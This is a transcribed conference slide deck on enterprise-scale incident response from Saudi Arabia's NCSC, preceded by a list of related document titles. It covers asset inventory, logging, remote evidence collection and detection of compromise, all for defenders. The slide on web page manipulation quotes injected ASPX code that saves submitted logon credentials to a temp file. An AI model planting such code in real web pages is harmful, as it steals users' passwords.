Incident Scale

Similar documents
Joe Stocker, CISSP, MCITP, VTSP Patriot Consulting

WHITEPAPER ATTIVO NETWORKS THREATDEFEND PLATFORM AND THE MITRE ATT&CK MATRIX

AUTHENTICATION. Do You Know Who You're Dealing With? How Authentication Affects Prevention, Detection, and Response

INCIDENT HANDLING & RESPONSE PROFESSIONAL VERSION 1

10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS

Building a Threat-Based Cyber Team

How Breaches Really Happen

Building Resilience in a Digital Enterprise

Assessing Your Incident Response Capabilities Do You Have What it Takes?

Premediation. The Art of Proactive Remediation. Matthew McWhirt, Senior Manager Manfred Erjak, Principal Consultant OCTOBER 1 4, 2018 WASHINGTON, D.C.

Testing for cyber resilience tools & techniques for adversary simulation and improved defense

ISO COMPLIANCE GUIDE. How Rapid7 Can Help You Achieve Compliance with ISO 27002

INCIDENT RESPONDER'S FIELD GUIDE INCIDENT RESPONDER'S INCIDENT RESPONSE PLAN FIELD GUIDE LESSONS FROM A FORTUNE 100 INCIDENT RESPONSE LEADER

10x Increase Your Team s Effectiveness by Automating the Boring Stuff

BOLSTERING DETECTION ABILITIES KENT KNUDSEN JUNE 23, 2016

FTA 2017 SEATTLE. Cybersecurity and the State Tax Threat Environment. Copyright FireEye, Inc. All rights reserved.

Cyber security tips and self-assessment for business

RSA Security Analytics

Tanium Endpoint Detection and Response. (ISC)² East Bay Chapter Training Day July 13, 2018

Privileged Account Security: A Balanced Approach to Securing Unix Environments

Security Aspects Control Rationale Best Practices Self-Assessment (Click all that applicable) 1. Security Policy and Security Management

ADVANCED THREAT PREVENTION FOR ENDPOINT DEVICES 5 th GENERATION OF CYBER SECURITY

Critical Hygiene for Preventing Major Breaches

SOLUTION BRIEF ASSESSING DECEPTION TECHNOLOGY FOR A PROACTIVE DEFENSE

Remediating Targeted-threat Intrusions

RSA INCIDENT RESPONSE SERVICES

Cyber Common Technical Core (CCTC) Advance Sheet Windows Operating Systems

TOP 10 IT SECURITY ACTIONS TO PROTECT INTERNET-CONNECTED NETWORKS AND INFORMATION

Attackers Process. Compromise the Root of the Domain Network: Active Directory

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

CONTROLLING YOUR OWN BATTLESPACE. From Threat Response Teams To Threat Intelligence Teams

A YEAR OF PURPLE. By Ryan Shepherd

Lessons from the Human Immune System Gavin Hill, Director Threat Intelligence

CyberArk Privileged Threat Analytics

Behavioral Analytics A Closer Look

RSA INCIDENT RESPONSE SERVICES

Seceon s Open Threat Management software

Surprisingly Successful: What Really Works in Cyber Defense. John Pescatore, SANS

Modern Realities of Securing Active Directory & the Need for AI

Reduce the Breach Detection Gap to Minutes. What is Forensic State Analysis (FSA)?

Un SOC avanzato per una efficace risposta al cybercrime

Getting over Ransomware - Plan your Strategy for more Advanced Threats

Technology Risk Management in Banking Industry. Rocky Cheng General Manager, Information Technology, Bank of China (Hong Kong) Limited

ANATOMY OF AN ATTACK!

Digital Forensics Readiness PREPARE BEFORE AN INCIDENT HAPPENS

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

Evolution of Cyber Security. Nasser Kettani Chief Technology Officer Microsoft, Middle East and Africa

CNIT 50: Network Security Monitoring. 9 NSM Operations

Are we breached? Deloitte's Cyber Threat Hunting

BUILDING AND MAINTAINING SOC

Incident Preparedness Report: Taming the Data Beast

Colin Gibbens Director, Product Management

INCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Unauthorized Access

Incident Responder Field Guide: Lessons from a Fortune 100 Incident Responder

INCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Elevation of Privilege

ForeScout Extended Module for Carbon Black

2017 Annual Meeting of Members and Board of Directors Meeting

Reducing the Cost of Incident Response

INCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Data Theft

Question No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output:

INCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Malware Outbreak

Pass-the-Hash Attacks

Gladiator Incident Alert

PrecisionAccess Trusted Access Control

INCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Virus Outbreak

PracticeDump. Free Practice Dumps - Unlimited Free Access of practice exam

Curso: Ethical Hacking and Countermeasures

EXABEAM HELPS PROTECT INFORMATION SYSTEMS

Automated Response in Cyber Security SOC with Actionable Threat Intelligence

Becoming the Adversary

Live Adversary Simulation: Red and Blue Team Tactics

Incident Response. Is Your CSIRT Program Ready for the 21 st Century?

Penetration Testing! The Nitty Gritty. Jeremy Conway Partner/CTO

Trend Micro and IBM Security QRadar SIEM

10 Active Directory Misconfigurations That Lead to Total Compromise Austin, TX 201 W 5th St.

Fidelis Overview. ISC 2 DoD and Industry Forum. Rapid Detection and Automated Incident Response DoD & Commercial Active Defense Use Cases

COPYRIGHTED MATERIAL. Contents. Part I: The Basics in Depth 1. Chapter 1: Windows Attacks 3. Chapter 2: Conventional and Unconventional Defenses 51

Cybersecurity. You have been breached; What Happens Next THE CHALLENGE FOR THE FINANCIAL SERVICES INDUSTRY

CYBER THREAT HUNTING DETECT ADVANCED THREATS HIDING IN YOUR NETWORK. A guide to the most effective methods.

Operationalizing the Three Principles of Advanced Threat Detection

Protecting Against Modern Attacks. Protection Against Modern Attack Vectors

Endpoint Protection : Last line of defense?

Symantec Ransomware Protection

Key Technologies for Security Operations. Copyright 2014 EMC Corporation. All rights reserved.

ENDPOINT SECURITY AND THE CLOUD: HOW TO APPLY PREDICTIVE ANALYTICS AND BIG DATA

Sobering statistics. The frequency and sophistication of cybersecurity attacks are getting worse.

Automated Threat Management - in Real Time. Vectra Networks

Threat Hunting in Modern Networks. David Biser

THE RSA SUITE NETWITNESS REINVENT YOUR SIEM. Presented by: Walter Abeson

I Was APT d. What Did They Steal?

Synchronized Security

Transforming Security from Defense in Depth to Comprehensive Security Assurance

Pass-the-Hash Attacks. Michael Grafnetter

Best Practices in Healthcare Risk Management. Balancing Frameworks/Compliance and Practical Security

Understanding Targeted Attacks. Sean Mason VP, Incident Response

Speed Up Incident Response with Actionable Forensic Analytics

Infrastructure Blind Spots Continue to Fuel Personal Data Breaches. Sanjay Raja Lumeta Corporation Lumeta Corporation

How do you track devices that have been approved for use? Are you automatically alerted if an unapproved device connects to the network?

RSA ECAT DETECT, ANALYZE, RESPOND!

10 FOCUS AREAS FOR BREACH PREVENTION

Transcription:

SESSION ID: SOP-T07 Incident Response @ Scale Salah Altokhais Incident Response Consultant National Cyber Security Center (NCSC),KSA @salah.altokhais Khalid Alsuwaiyel Incident Response Specialist National Cyber Security Center (NCSC),KSA

Session Overview Introduction and Overview Current Defenses are failing!! Enterprise Incident Response Techniques Preparation Detection Q & A 2

Introduction No system or network is 100% secure Global average days for breach discovery: 146 days in 2016 (1) Average detection in the Middle East : 456 days ( 2) 3 times longer Cyber is becoming the new dimension in war. (5 th Domain) ( 1) Mandiant M-Trend 2016 (2) Mandiant Global EMEA report 3

Saudi Arabia Threat Landscape NCSC Statistics in 2017 (until 15-October) Security Events 1036 Incident notification 329 Incident Responded 95 0 200 400 600 800 1000 1200 75% of organizations get notified by NCSC or External partners Several Organizations got compromised again after the remediation 4

Current defenses are failing!! False sense of security and isolation Critical Alerts possibly ignored: AV, SCOM, SIEM, others.. limited asset inventory and understanding of the environment Deniability of the incident occurrence Required logs/events are not saved or overwritten No Incident Response policy or procedures 5

Targeted Attacks Life Cycle Reconnaissance & information gathering Backdoors Compromised accounts Malware VPN access Net Use commands SMB RDP PowerShell / WMI Spear Phishing emails web-based attacks Third-party exploitation Command and control Custom malware Password cracking Application exploitation pass-the-hash Critical system recon System, Active Directory & user enumeration Data Consolidation Data theft Hide tracks Destruction 6

Enterprise Incident Response Techniques

Enterprise IR What is Enterprise Incident Response? The ability to scan/search the whole environment for IoCs and Artifacts What is Threat Hunting? Research or analysis that leads to new forms of automated detection Batch analysis Data stacking 8

What We Always Hear! My Network is So Big, I don t Know What s in There! No up-to-date asset Inventory Forgotten Systems Unknown Systems Someone Gave Me IOCs, But I Can t Scan for it! No Yara Support Lack of Resources, Budget and Technology 9

What We Always Hear! No problem, we have methods to overcome these issues 10

Incident Response Overview Today s focus 11

Preparation Asset Inventory Local and external network configuration Evidence Readiness 12

Asset Inventory Identify all systems in the environment Get-ADComputer -Filter * -Properties * Count how many systems have been logged on the past X Days Get-ADComputer -Filter {LastLogon -lt $time -and enabled -eq $true} - Properties LastLogon, description Review users and admin counts Check for new users or unconventional organization names 13

Local and External Network Configuration Make the adversaries life more difficult!! Document all open ports ( publicly facing and internal) Enable NetFlow on supported network devices Do a Configuration Assessment e.g: Load Balancers misconfiguration may not reveal the actual IP 14

Local and External Network Configuration (cont.) Other connected networks? Partners, clients and managed services Treat as untrusted 15

Ensure All Needed Logs Are There Network Logs DNS Log Client to Client Communication (Especially Out of Working Hours) Full PCAP For Critical Systems (PCAP Never Lies) Server/ Endpoint Logs Windows Event forwarding Remote Access auditing Sysmon, PowerShell Auditing, etc 16

Collection Methods for Windows Three main methods to collect data from remote machines: Windows Management Instrumentation (WMI) Might expose credentials to the attacker Difficult to use Windows Remote Management (WinRM) Microsoft implementation of WS-Management Protocol By default enabled on Windows Server 2012 and later Group Policy Object (GPO) 17

Detection Look For The Smoke, Then Look For The Fire. 18

Detection - Malicious Code Execution history: (Amcache / Shimcache ) Provides history of programs execution Effective to detect malicious files executed How to scale it? Invoke-Command Computers $computers ScriptBlock { [Convert]::ToBase64String( [IO.File]::ReadAllBytes( C:\Windows\AppCompat/Programs/Amcache.hve } 19

Detection - Malicious Code (cont.) Exchange Servers: number of files being executed for the first time (based on SHA1 hash) System Installation Attacker s Activity 20

Detection - Remote Execution WinRM Port (PowerShell Remoting): Look for Any Traffic on Port 5985 (HTTP) or 5986 (HTTPS) PsExec: PsExec Service Will Be Installed On Remote System RDP: All Outgoing RDP Connection: Found On Software\Microsoft\Terminal Server Client\Default On Each NTUSER.DAT 21

Detection - Failed Logons Failed Logon Count can be queried from the AD Failed Logon Alert? 22

Detection - windows Events Windows Events logs collection with PowerShell Suspicious Events 1102(logs deleted) 4728, 4732, 4756 (User Added to Privileged Group) And many more 23

Detection - Anti-Virus Alerts 24

Detection - C2 Continues Beaconing? Request frequency Mismatch Port or Protocol Encrypted traffic over Port 80 SSH over unconventional Ports DNS High volume requests Long sessions 25

Detection - Request Frequency 180000 DNS Requests Count/Day from a compromised Network 160000 140000 120000 100000 80000 60000 40000 20000 0 26

Detection - DNS by request size DNS request Size 27

Detection - Web Page Manipulation Main servers (redundant) have identical files E.g: Mail Exchanges and Client Access Servers will have identical.aspx pages <%if (!string.isnullorempty(request["urf"]) &&!string.isnullorempty(request["prf"])) { System.IO.File.AppendAllText("C:\\Windows\\Temp\\MSK0244" + count, Request["urf"] + " " + Request["prf"]); isok = false; } Injected Code Into The Logon Page to Steal Passwords 28

Containment, Eradication and Recovery I have an Incident, what should I do? Follow the IR policy and inform management Contact your local CERT/ Cyber security Authority Identify all infected systems (do not rush) Possible actions on infected systems: Delete malware and use the latest backup (could be infected) Re-build from scratch Discard the system and destruct the HW 29

Containment, Eradication and Recovery Plan for a remediation weekend, to eradicate the infection at once All teams have to be involved Once ready, Disconnect the infected network/systems Start the replacement of systems Test and reconnect the network Lesson learned meeting 30

Key Takeaways Assume breach and understand you environment Prepare and practice the Incident Response policy You already own the technology Automate as mush as possible, NCSC Hunter Remediation plan is the most critical step in IR lifecycle 31

شكرا Questions & Answers Website: www.ncsc.gov.sa Twitter: @NCSC_SA 32